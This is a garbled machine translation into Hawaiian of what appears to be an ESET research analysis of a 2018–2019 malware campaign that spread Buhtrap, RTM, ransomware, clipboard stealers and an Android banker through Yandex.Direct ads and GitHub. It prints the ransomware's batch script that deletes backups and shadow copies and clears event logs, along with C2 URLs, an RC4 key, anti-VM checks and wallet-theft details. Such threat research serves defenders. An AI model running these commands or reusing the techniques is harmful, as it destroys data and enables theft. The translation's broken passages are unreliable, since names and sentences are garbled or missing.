No ka hoʻopaʻa ʻana i nā mea hoʻopukapuka ma kahi hoʻouka kaua cyber, hiki iā ʻoe ke hoʻohana i nā palapala hana a lākou e ʻimi nei ma ka pūnaewele. ʻO kēia ka mea i hana ʻia e kahi hui cyber i nā mahina i hala iho nei, e hāʻawi ana i nā puka kua ʻike ʻia. и , a me nā mea hoʻopunipuni a me nā lako polokalamu no ka ʻaihue ʻana i nā kālā crypto. Aia ka hapa nui o nā pahuhopu i Rusia. Ua hana ʻia ka hoʻouka kaua ʻana ma ke kau ʻana i nā hoʻolaha ʻino ma Yandex.Direct. Ua kuhikuhi ʻia ka poʻe i hoʻopilikia ʻia i kahi pūnaewele kahi i noi ʻia ai lākou e hoʻoiho i kahi faila ʻino i hoʻololi ʻia ma ke ʻano he palapala palapala. Ua wehe ʻo Yandex i ka hoʻolaha ʻino ma hope o kā mākou ʻōlelo aʻo.
Ua hoʻokuʻu ʻia ke code kumu o Buhtrap ma ka pūnaewele i ka wā ma mua i hiki i kekahi ke hoʻohana. ʻAʻohe o mākou ʻike e pili ana i ka loaʻa ʻana o ka code RTM.
Ma kēia pou e haʻi aku mākou iā ʻoe pehea i puʻunaue ai ka poʻe hoʻouka i ka malware me ka hoʻohana ʻana iā Yandex.Direct a hoʻokipa iā ia ma GitHub. E hoʻopau ʻia ka pou me ka loiloi ʻenehana o ka malware.
Ua hoʻi hou ʻo Buhtrap a me RTM i ka ʻoihana
Mechanism o ka laha a me ka poino
ʻO nā uku uku like ʻole i hāʻawi ʻia i ka poʻe i hōʻeha ʻia i kahi ʻano hoʻolaha maʻamau. Ua waiho ʻia nā faila ʻino a pau i hana ʻia e nā mea hoʻouka i loko o ʻelua mau waihona GitHub.
ʻO ka maʻamau, aia i loko o ka waihona hoʻokahi faila hewa hiki ke hoʻoiho ʻia, i hoʻololi pinepine ʻia. Ma muli o ka ʻae ʻana o GitHub iā ʻoe e ʻike i ka mōʻaukala o nā hoʻololi i kahi waihona, hiki iā mākou ke ʻike i ke ʻano o ka malware i puʻunaue ʻia i kekahi manawa. No ka hoʻohuli ʻana i ka mea i pepehi ʻia e hoʻoiho i ka faila ʻino, ua hoʻohana ʻia ka pūnaewele blanki-shabloni24[.]ru, i hōʻike ʻia ma ka kiʻi ma luna.
ʻO ka hoʻolālā o ka pūnaewele a me nā inoa a pau o nā faila hewa e hahai i kahi manaʻo hoʻokahi - nā ʻano, nā templates, nā ʻaelike, nā laʻana, a me nā mea ʻē aʻe. Ke noʻonoʻo nei ua hoʻohana mua ʻia nā polokalamu Buhtrap a me RTM i ka hoʻouka ʻana i nā mea helu kālā i ka wā ma mua, ua manaʻo mākou ʻo ka ka hoʻolālā i ka hoʻolaha hou like. ʻO ka nīnau wale nō pehea i hele ai ka mea i hōʻeha i ka pūnaewele o nā mea hoʻouka.
Ka ma'i ma'i
ʻO ka liʻiliʻi o kekahi mau mea i hoʻopaʻa ʻia ma kēia pūnaewele i hoʻowalewale ʻia e ka hoʻolaha ʻino. Aia ma lalo kahi laʻana URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
E like me kāu e ʻike ai ma ka loulou, ua paʻi ʻia ka hae ma ka ʻaha helu helu kūpono bb.f2[.]kz. He mea nui e hoʻomaopopo i ka ʻike ʻia ʻana o nā hae ma nā pūnaewele like ʻole, loaʻa iā lākou ka id hoʻolaha hoʻokahi (blanki_rsya), a pili loa i nā lawelawe kōkua kālā. Hōʻike ka URL ua hoʻohana ka mea i hoʻopaʻi ʻia i ka noi "hoʻoiho i ka pepa palapala," e kākoʻo ana i kā mākou kuhiakau o nā hoʻouka ʻia. Aia ma lalo nā pūnaewele kahi i ʻike ʻia ai nā hae a me nā nīnau hulina pili.
- hoʻoiho i ka palapala pepa – bb.f2[.]kz
- laʻana aelike - Ipopen[.]ru
- laʻana hoʻopiʻi noi - 77metrov[.]ru
- palapala ʻaelike - blank-dogovor-kupli-prodazhi[.]ru
- laʻana palapala noi hoʻokolokolo - zen.yandex[.]ru
- laʻana hoʻopiʻi - yurday[.]ru
- laʻana palapala aelike – Regforum[.]ru
- palapala ʻaelike – assistentus[.]ru
- laʻana hale ʻaelike – napravah[.]com
- nā laʻana o nā ʻaelike kānāwai - avito[.]ru
Ua hoʻonohonoho ʻia paha ka pūnaewele blanki-shabloni24[.]ru e hāʻawi i kahi loiloi ʻike maʻalahi. ʻO ka maʻamau, ʻo kahi hoʻolaha e kuhikuhi ana i kahi pūnaewele ʻoihana me kahi loulou i GitHub ʻaʻole like me kahi mea ʻino. Eia kekahi, ua hoʻouka ka poʻe hoʻouka i nā faila hewa i ka waihona no ka manawa palena wale nō, i ka wā o ka hoʻolaha. ʻO ka hapa nui o ka manawa, aia i loko o ka waihona GitHub kahi waihona zip ʻole a i ʻole kahi faila EXE blank. No laila, hiki i nā mea hoʻouka ke hoʻolaha i ka hoʻolaha ma o Yandex.Direct ma nā pūnaewele i kipa ʻia e nā mea helu kālā i hele mai ma ka pane ʻana i nā nīnau hulina kikoʻī.
A laila, e nānā kākou i nā uku uku like ʻole i puʻunaue ʻia ma kēia ʻano.
Nānā Uku Uku
Chronology of distribution
Ua hoʻomaka ka hoʻolaha ʻino i ka hopena o ʻOkakopa 2018 a ke hana nei i ka manawa kākau. Ma muli o ka loaʻa ʻana o ka waihona holoʻokoʻa ma GitHub, ua hōʻuluʻulu mākou i kahi manawa kūpono o ka hoʻohele ʻana i nā ʻohana malware ʻeono (e ʻike i ke kiʻi ma lalo). Ua hoʻohui mākou i kahi laina e hōʻike ana i ka wā i ʻike ʻia ai ka loulou hae, e like me ke ana ʻana e ka telemetry ESET, no ka hoʻohālikelike ʻana me ka mōʻaukala git. E like me kāu e ʻike ai, pili maikaʻi kēia me ka loaʻa o ka uku uku ma GitHub. Hiki ke wehewehe ʻia ka ʻokoʻa i ka hopena o Pepeluali ma ka ʻoiaʻiʻo ʻaʻole i loaʻa iā mākou kahi ʻāpana o ka mōʻaukala hoʻololi no ka mea ua hoʻoneʻe ʻia ka waihona mai GitHub ma mua o ka hiki iā mākou ke kiʻi piha.
Kiʻi 1. Chronology o ka puʻunaue malware.
Palapala Kakau inoa
Ua hoʻohana ka hoʻolaha i nā palapala hōʻoia he nui. Ua pūlima ʻia kekahi e ka ʻohana malware ʻoi aku ma mua o hoʻokahi, kahi e hōʻike hou ai i nā ʻokoʻa like ʻole no ka hoʻolaha like. ʻOiai ka loaʻa ʻana o ke kī pilikino, ʻaʻole i hoʻopaʻa inoa nā mea hoʻohana i nā binaries a ʻaʻole hoʻohana i ke kī no nā laʻana a pau. I ka hopena o Pepeluali 2019, hoʻomaka ka poʻe hoʻouka kaua e hana i nā pūlima hewa ʻole me ka hoʻohana ʻana i kahi palapala hōʻoia a Google no ka mea ʻaʻole lākou i loaʻa ke kī pilikino.
ʻO nā palapala hōʻoia āpau i komo i ka hoʻolaha a me nā ʻohana malware a lākou e kau inoa ai ma ka papa ma lalo nei.
Ua hoʻohana pū mākou i kēia mau palapala hōʻoia no ka hoʻokumu ʻana i nā loulou me nā ʻohana malware ʻē aʻe. No ka hapa nui o nā palapala hōʻoia, ʻaʻole mākou i ʻike i nā laʻana i hāʻawi ʻole ʻia ma o kahi waihona GitHub. Eia nō naʻe, ua hoʻohana ʻia ka palapala TOV "MARIYA" e hoʻopaʻa inoa i ka malware no ka botnet , adware a me nā miners. ʻAʻole paha pili kēia polokalamu malware i kēia hoʻolaha. ʻO ka mea nui, ua kūʻai ʻia ka palapala hōʻoia ma ka darknet.
Win32/Filecoder.Buhtrap
ʻO ka mea mua i hopu i ko mākou nānā ʻana ʻo ia ka Win32/Filecoder.Buhtrap hou i ʻike ʻia. ʻO kēia kahi faila binary Delphi i hoʻopaʻa ʻia i kekahi manawa. Ua hoʻolaha nui ʻia ma Pepeluali-Malaki 2019. Hana ia e like me ka polokalamu ransomware - ʻimi ʻo ia i nā drive kūloko a me nā waihona pūnaewele a hoʻopili i nā faila i loaʻa iā ia. ʻAʻole pono e hoʻopili ʻia kahi pilina pūnaewele no ka mea ʻaʻole ia e hoʻopili i ke kikowaena e hoʻouna i nā kī hoʻopunipuni. Akā, hoʻohui ia i kahi "hōʻailona" i ka hopena o ka leka hoʻouku, a manaʻo e hoʻohana i ka leka uila a i ʻole Bitmessage e hoʻopili i nā mea hana.
No ka hoʻopili ʻana i nā kumuwaiwai koʻikoʻi e like me ka hiki, e holo ana ʻo Filecoder.Buhtrap i kahi pae i hoʻolālā ʻia e pani i nā polokalamu kī i loaʻa paha i nā mea hoʻohana waihona waihona i loaʻa nā ʻike waiwai e hiki ke hoʻopilikia i ka hoʻopili ʻana. ʻO nā kaʻina hana i manaʻo ʻia he ʻōnaehana hoʻokele waihona (DBMS). Eia kekahi, hoʻopau ʻo Filecoder.Buhtrap i nā faila log a me nā backup e hana paʻakikī i ka hoʻihoʻi ʻana i ka ʻikepili. No ka hana ʻana i kēia, e holo i ka ʻatikala batch ma lalo.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Hoʻohana ʻo Filecoder.Buhtrap i kahi lawelawe IP Logger kūpono i hoʻolālā ʻia e hōʻiliʻili i ka ʻike e pili ana i nā malihini kipa. Hoʻolālā ʻia kēia e ʻimi i ka poʻe i loaʻa i ka ransomware, ʻo ia ke kuleana o ka laina kauoha:
mshta.exe "javascript:document.write('');"
Koho ʻia nā faila no ka hoʻopili ʻana inā ʻaʻole like lākou i ʻekolu papa inoa hoʻokuʻu. ʻO ka mea mua, ʻaʻole i hoʻopili ʻia nā faila me kēia mau hoʻonui: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys a me .bat. ʻO ka lua, ua kāpae ʻia nā faila āpau i loaʻa i ke ala piha nā kaula kuhikuhi mai ka papa inoa ma lalo nei.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
ʻO ke kolu, ua kāpae ʻia kekahi mau inoa faila mai ka hoʻopili ʻana, ma waena o lākou ka inoa faila o ka leka hoʻouku. Hōʻike ʻia ka papa inoa ma lalo nei. ʻIke loa, ua manaʻo ʻia kēia mau ʻokoʻa a pau e hoʻomau i ka holo ʻana o ka mīkini, akā me ka liʻiliʻi o ke alanui.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Hoʻolālā hoʻopili waihona
Ke hoʻokō ʻia, hoʻopuka ka malware i kahi kī kī RSA 512-bit. Hoʻopili ʻia ka exponent pilikino (d) a me modulus (n) me kahi kī ākea 2048-bit paʻakikī (public exponent a modulus), zlib-packed, a me base64 i hoʻopili ʻia. Hōʻike ʻia ke code e pili ana i kēia ma ke Kiʻi 2.
Kiʻi 2. Ka hopena o ka Hex-Rays decompilation o ka 512-bit RSA key pair generation process.
Aia ma lalo kahi laʻana o ka kikokikona maʻamau me kahi kī pilikino i hana ʻia, ʻo ia kahi hōʻailona i hoʻopili ʻia i ka leka hoʻouku.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Hāʻawi ʻia ma lalo nei ke kī ākea o ka poʻe hoʻouka.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Hoʻopili ʻia nā faila me ka hoʻohana ʻana iā AES-128-CBC me kahi kī 256-bit. No kēlā me kēia faila i hoʻopili ʻia, hana ʻia kahi kī hou a me kahi vector hoʻomaka hou. Hoʻohui ʻia ka ʻike koʻikoʻi i ka hope o ka faila i hoʻopili ʻia. E noʻonoʻo kākou i ke ʻano o ka faila i hoʻopili ʻia.
Loaʻa i nā faila i hoʻopili ʻia ke poʻo:
Hoʻopili ʻia ka ʻikepili waihona kumu me ka hoʻohui ʻana o ka waiwai kilokilo VEGA i ka 0x5000 bytes mua. Hoʻopili ʻia nā ʻike decryption āpau i kahi faila me kēia ʻano hana:
- Aia ka māka nui o ka faila i kahi hōʻailona e hōʻike ana inā ʻoi aku ka nui o ka faila ma mua o 0x5000 bytes i ka nui
— AES kī blob = ZlibCompress(RSAEncrypt(AES kī + IV, kī lehulehu o ka hui kī RSA i hana ʻia))
- RSA kī blob = ZlibCompress(RSAEncrypt(hana RSA kī pilikino, kī kī lehulehu RSA paʻakikī))
Win32/ClipBanker
ʻO Win32/ClipBanker kahi mea i puʻunaue pinepine ʻia mai ka hopena o ʻOkakopa a i ka hoʻomaka ʻana o Dekemaba 2018. ʻO kāna kuleana ka nānā ʻana i nā ʻike o ka clipboard, ʻimi ʻo ia i nā wahi o nā ʻeke kālā cryptocurrency. Ma hope o ka hoʻoholo ʻana i ka helu helu peke kālā, hoʻololi ʻo ClipBanker iā ia me kahi helu i manaʻo ʻia no nā mea hoʻohana. ʻAʻole i pahu ʻia a ʻaʻole i pohihihi ʻia nā laʻana a mākou i nānā ai. ʻO ka mīkini hoʻokahi wale nō i hoʻohana ʻia no ka uhi ʻana i ka hana ʻo ka encryption string. Hoʻopili ʻia nā ʻōlelo kikoʻī o ka mea hoʻohana me ka RC4. ʻO nā cryptocurcies target he Bitcoin, Bitcoin cash, Dogecoin, Ethereum a me Ripple.
I ka wā o ka hoʻolaha ʻana o ka malware i nā wallets Bitcoin o ka poʻe hoʻouka, ua hoʻouna ʻia kahi kālā liʻiliʻi i VTS, kahi mea kānalua i ka kūleʻa o ka hoʻolaha. Eia hou, ʻaʻohe mea hōʻike e hōʻike ana ua pili kēia mau hana me ClipBanker.
Win32/RTM
Ua māhele ʻia ka ʻāpana Win32/RTM no kekahi mau lā i ka hoʻomaka ʻana o Malaki 2019. ʻO RTM kahi waihona kālā Trojan i kākau ʻia ma Delphi, e kuhikuhi ana i nā ʻōnaehana waihona mamao. I ka makahiki 2017, hoʻopuka nā mea noiʻi ESET o kēia papahana, pili mau ka wehewehe. I Ianuali 2019, ua hoʻokuʻu pū ʻia ʻo Palo Alto Networks .
ʻO Buhtrap Loader
No kekahi manawa, loaʻa kahi mea hoʻoiho ma GitHub i like ʻole me nā mea hana Buhtrap ma mua. Huli ʻo ia i https://94.100.18[.]67/RSS.php?<some_id> e kiʻi i ka pae aʻe a hoʻouka pololei i ka hoʻomanaʻo. Hiki iā mākou ke hoʻokaʻawale i ʻelua mau ʻano o ke code pae ʻelua. Ma ka URL mua, ua hala pololei ʻo RSS.php i ka puka hope o Buhtrap - ua like loa kēia puka hope me ka mea i loaʻa ma hope o ka hoʻokuʻu ʻia ʻana o ke code kumu.
ʻO ka mea mahalo, ʻike mākou i kekahi mau hoʻolaha me ka Buhtrap backdoor, a ua ʻōlelo ʻia lākou e holo ʻia e nā mea hana like ʻole. I kēia hihia, ʻo ka ʻokoʻa nui ke hoʻouka pololei ʻia ka backdoor i ka hoʻomanaʻo a ʻaʻole hoʻohana i ka hoʻolālā maʻamau me ke kaʻina hana DLL a mākou i kamaʻilio ai. . Eia hou, ua hoʻololi nā mea hoʻohana i ke kī RC4 i hoʻohana ʻia no ka hoʻopili ʻana i ka ʻoihana pūnaewele i ke kikowaena C&C. I ka hapa nui o nā hoʻolaha a mākou i ʻike ai, ʻaʻole pilikia nā mea hana i ka hoʻololi ʻana i kēia kī.
ʻO ka lua, ʻoi aku ka paʻakikī o ka hāʻawi ʻia ʻana o ka RSS.php URL i kahi mea hoʻoili ʻē aʻe. Ua hoʻokō ʻia kekahi obfuscation, e like me ke kūkulu hou ʻana i ka papa hoʻokomo ikaika. ʻO ke kumu o ka bootloader e hoʻopili i ke kikowaena C&C [.]com/api/F27F84EDA4D13B15/2, hoʻouna i nā lāʻau a kali i ka pane. Hoʻoponopono ia i ka pane ma ke ʻano he blob, hoʻouka iā ia i ka hoʻomanaʻo a hoʻokō. ʻO ka uku uku a mākou i ʻike ai i ka hoʻokō ʻana i kēia mea hoʻoili, ʻo ia ka puka hope o Buhtrap, akā aia kekahi mau mea ʻē aʻe.
Android/Spy.Banker
ʻO ka mea mahalo, ua loaʻa pū kekahi ʻāpana no ka Android ma ka waihona GitHub. Aia ʻo ia ma ka lālā nui no hoʻokahi lā - Nowemapa 1, 2018. Ma waho aʻe o ka hoʻopuka ʻia ʻana ma GitHub, ʻaʻole ʻike ʻo ESET telemetry i kahi hōʻike o ka puʻu ʻia ʻana o kēia malware.
Ua mālama ʻia ka ʻāpana ma ke ʻano he Android Application Package (APK). Ua pohihihi loa. Ua hūnā ʻia ka hana ʻino i loko o kahi JAR i hoʻopili ʻia i loko o ka APK. Hoʻopili ʻia me RC4 me kēia kī:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Hoʻohana ʻia ke kī like a me ka algorithm e hoʻopili ai i nā kaula. Aia ʻo JAR ma APK_ROOT + image/files. Aia nā 4 bytes mua o ka faila i ka lōʻihi o ka JAR i hoʻopili ʻia, e hoʻomaka koke ana ma hope o ke kahua lōʻihi.
Ma hope o ka wehe ʻana i ka faila, ʻike mākou ʻo Anubis - ma mua panakō no Android. Aia nā hiʻohiʻona o ka malware:
- hoʻopaʻa microphone
- lawe kiʻi paʻi kiʻi
- e kiʻi ana i nā hoʻonohonoho GPS
- keylogger
- ka hoʻopili ʻana i ka ʻikepili a me ka noi pānaʻi
- hoʻouna spam
ʻO ka mea mahalo, ua hoʻohana ka mea panakō iā Twitter ma ke ʻano he kaila kamaʻilio kākoʻo e kiʻi i kahi kikowaena C&C ʻē aʻe. ʻO ka laʻana a mākou i hoʻopaʻa ʻia i hoʻohana i ka moʻokāki @JonesTrader, akā i ka manawa o ka nānā ʻana ua pāpā ʻia.
Loaʻa i ka banker kahi papa inoa o nā noi i hoʻopaʻa ʻia ma ka polokalamu Android. ʻOi aku ka lōʻihi ma mua o ka papa inoa i loaʻa i ka noiʻi Sophos. Aia ka papa inoa i nā noi waihona kālā, nā polokalamu kūʻai pūnaewele e like me Amazon a me eBay, a me nā lawelawe cryptocurrency.
MSIL/ClipBanker.IH
ʻO ka mea hope loa i puʻunaue ʻia ma ke ʻano o kēia hoʻolaha ʻo ia ka .NET Windows executable, i hōʻike ʻia ma Malaki 2019. Hoʻopili ʻia ka hapa nui o nā mana i aʻo ʻia me ConfuserEx v1.0.0. E like me ClipBanker, hoʻohana kēia ʻāpana i ka clipboard. ʻO kāna pahuhopu ka nui o nā cryptocurrencies, a me nā hāʻawi ma Steam. Eia kekahi, hoʻohana ʻo ia i ka lawelawe IP Logger e ʻaihue i ke kī WIF pilikino Bitcoin.
Nā Mekini Palekana
Ma waho aʻe o nā pōmaikaʻi a ConfuserEx e hāʻawi ai i ka pale ʻana i ka debugging, ka hoʻolei ʻana, a me ka hoʻopili ʻana, ʻo ia ka mea i hiki ke ʻike i nā huahana antivirus a me nā mīkini virtual.
No ka hōʻoia i ka holo ʻana i loko o kahi mīkini virtual, hoʻohana ka malware i ka laina kauoha Windows WMI i kūkulu ʻia (WMIC) e noi i ka ʻike BIOS, ʻo ia hoʻi:
wmic bios
A laila hoʻopau ka papahana i ka puka kauoha a nānā i nā huaʻōlelo: VBOX, VirtualBox, XEN, qemu, bochs, VM.
No ka ʻike ʻana i nā huahana antivirus, hoʻouna ʻo malware i kahi noi Windows Management Instrumentation (WMI) i Windows Security Center me ka hoʻohana ʻana ManagementObjectSearcher API e like me ka hōʻike ʻana ma lalo nei. Ma hope o ka hoʻololi ʻana mai base64 ke ʻano o ke kelepona penei:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Kiʻi 3. Kaʻina hana no ka ʻike ʻana i nā huahana antivirus.
Eia kekahi, ʻike ka malware inā , he mea hana e pale aku ai i ka hoʻouka ʻana i ka clipboard a, inā e holo ana, e hoʻopaneʻe i nā kaula āpau ma ia kaʻina hana, a laila e hoʻopau i ka pale.
Hoʻomau
ʻO ka mana o ka malware a mākou i aʻo ai i kope iā ia iho %APPDATA%googleupdater.exe a hoʻonoho i ke ʻano "huna" no ka papa kuhikuhi google. A laila hoʻololi ʻo ia i ka waiwai SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell i ka Windows registry a hoʻohui i ke ala updater.exe. Ma kēia ala, e hoʻokō ʻia ka malware i kēlā me kēia manawa e komo ai ka mea hoʻohana.
Hana ʻino
E like me ClipBanker, nānā ka malware i nā ʻike o ka clipboard a nānā i nā helu wahi kālā cryptocurrency, a i ka wā e loaʻa ai, hoʻololi iā ia me kekahi o nā ʻōlelo a ka mea hoʻohana. Aia ma lalo kahi papa inoa o nā helu wahi e pili ana i ka mea i loaʻa ma ke code.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
No kēlā me kēia ʻano helu wahi he ʻōlelo maʻamau e pili ana. Hoʻohana ʻia ka waiwai STEAM_URL no ka hoʻouka ʻana i ka ʻōnaehana Steam, e like me ka mea i ʻike ʻia mai ka ʻōlelo maʻamau i hoʻohana ʻia e wehewehe i ka buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Kaila exfiltration
Ma waho aʻe o ka hoʻololi ʻana i nā ʻōlelo i loko o ka buffer, ke kuhi nei ka malware i nā kī WIF pilikino o Bitcoin, Bitcoin Core a me Electrum Bitcoin wallets. Hoʻohana ka papahana i ka plogger.org ma ke ala exfiltration e loaʻa ai ke kī pilikino WIF. No ka hana ʻana i kēia, hoʻohui nā mea hoʻohana i ka ʻikepili kī pilikino i ke poʻomanaʻo HTTP User-Agent, e like me ka hōʻike ʻana ma lalo nei.
Kiʻi 4. IP Logger console me ka ʻikepili puka.
ʻAʻole hoʻohana nā mea hoʻohana i ka iplogger.org e hoʻopau i nā ʻeke. Ua hoʻohana paha lākou i kahi ala ʻē aʻe ma muli o ka palena o ke ʻano 255 i ke kula User-Agenthōʻike ʻia ma ka ʻaoʻao pūnaewele IP Logger. I loko o nā laʻana a mākou i aʻo ai, ua mālama ʻia ke kikowaena hoʻopuka ʻē aʻe i loko o ka loli kaiapuni DiscordWebHook. ʻO ka mea kupanaha, ʻaʻole i hāʻawi ʻia kēia ʻano hoʻololi kaiapuni ma nā wahi āpau o ke code. Hōʻike kēia i ka hoʻomohala ʻia ʻana o ka malware a ua hāʻawi ʻia ka loli i ka mīkini hoʻāʻo o ka mea hoʻohana.
Aia kekahi hōʻailona ʻē aʻe ke kūkulu ʻia nei ka papahana. Aia i loko o ka waihona binary ʻelua URL iplogger.org, a ua nīnau ʻia ʻelua i ka wā e hoʻopau ʻia ai ka ʻikepili. Ma kahi noi i kekahi o kēia mau URL, ʻo ka waiwai ma ke kahua Referer ma mua o "DEV /". Ua ʻike pū mākou i kahi mana i hoʻopaʻa ʻole ʻia me ka hoʻohana ʻana iā ConfuserEx, ʻo ka mea i loaʻa kēia URL ua kapa ʻia ʻo DevFeedbackUrl. Ma muli o ka inoa hoʻololi kaiapuni, manaʻo mākou e hoʻolālā nā mea hoʻohana e hoʻohana i ka lawelawe kūpono Discord a me kāna ʻōnaehana interception pūnaewele e ʻaihue i nā ʻeke kālā crypto.
hopena
He laʻana kēia hoʻolaha o ka hoʻohana ʻana i nā lawelawe hoʻolaha kūpono i ka hoʻouka kaua cyber. Hoʻolālā ka papahana i nā hui Lūkini, akā ʻaʻole mākou e kāhāhā i ka ʻike ʻana i kēlā hoʻouka kaua me ka hoʻohana ʻana i nā lawelawe ʻaʻole Lūkini. I mea e pale aku ai i ka ʻae ʻana, pono e hilinaʻi nā mea hoʻohana i ka inoa o ke kumu o ka polokalamu a lākou e hoʻoiho ai.
Loaʻa ka papa inoa piha o nā hōʻailona o ka ʻae a me nā ʻano MITER ATT&CK ma .
Source: www.habr.com